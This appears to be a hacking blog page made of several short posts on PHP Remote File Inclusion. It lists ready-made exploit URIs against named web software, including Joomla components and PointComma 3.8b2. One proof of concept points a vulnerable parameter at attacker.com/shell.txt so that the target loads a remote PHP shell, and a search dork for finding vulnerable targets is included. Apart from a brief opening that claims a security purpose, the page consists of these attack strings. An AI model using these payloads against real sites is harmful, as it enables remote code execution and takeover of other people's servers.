Filed under: Hack, Never Endless Story | Tags: attack, Hack, hacking, job, script kiddies, security, vulnerable
immediately secure your system
because now a lot of script kiddies around
I deliberately posting on the topic of Remote File Include this to add to our knowledge of hacking activities
how far they could penetrate our system
and how they do it
There is no safe in our system
there is always a way for hackers to do their crazy action
then what should we do to secure our system?
how to prevent hackers entered into our system?
the answer may be our only knows.
creative and safe learning
Filed under: Hack | Tags: bot, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies
################################################
[ Vulnerable File ]
http://127.0.0.1/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfi
g_absolute_path]=[hell]
[ BUG IN ]
ajcuser.php
error in line 7
// include our comprofiler class
require_once($GLOBALS['mosConfig_absolute_path'].’/components/com_ajaxchat/
plugins/plugin.user.php’);
################################################
Filed under: Hack | Tags: bot, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies
######################################################################## #PointComma <= 3.8b2 Remote File Include Vulnerability #Download Script : http://nchc.dl.sourceforge.net/project/pointcomma/pointcomma/ #Dork : die(“Hacking attempt”); 
######################################################################## # #Vuln : ./PointComma-3.8b2/includes/classes/pctemplate.php (line 14) # #PoC : http://0wn3d.com/[path]/includes/classes/pctemplate.php?pcConfig[smartyPath ]=http://attacker.com/shell.txt?cmd # # # ########################################################################
Filed under: Hack | Tags: bot, Hack, hacking, php shell, remote file include, remote file inclusion, RFI, script kiddies
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/path/main/anketa/new.php?site_path=[SHELL]
Filed under: Hack | Tags: bot, Hack, hacking, php shell, remote file include, remote file inclusion, RFI
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=shell.txt
Filed under: Hack | Tags: bot, Hack, hacking, php shell, remote file include, remote file inclusion, RFI
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/path/main/anketa/new.php?site_path=[SHELL]
From : http://www.securityfocus.com/bid/37235/exploit
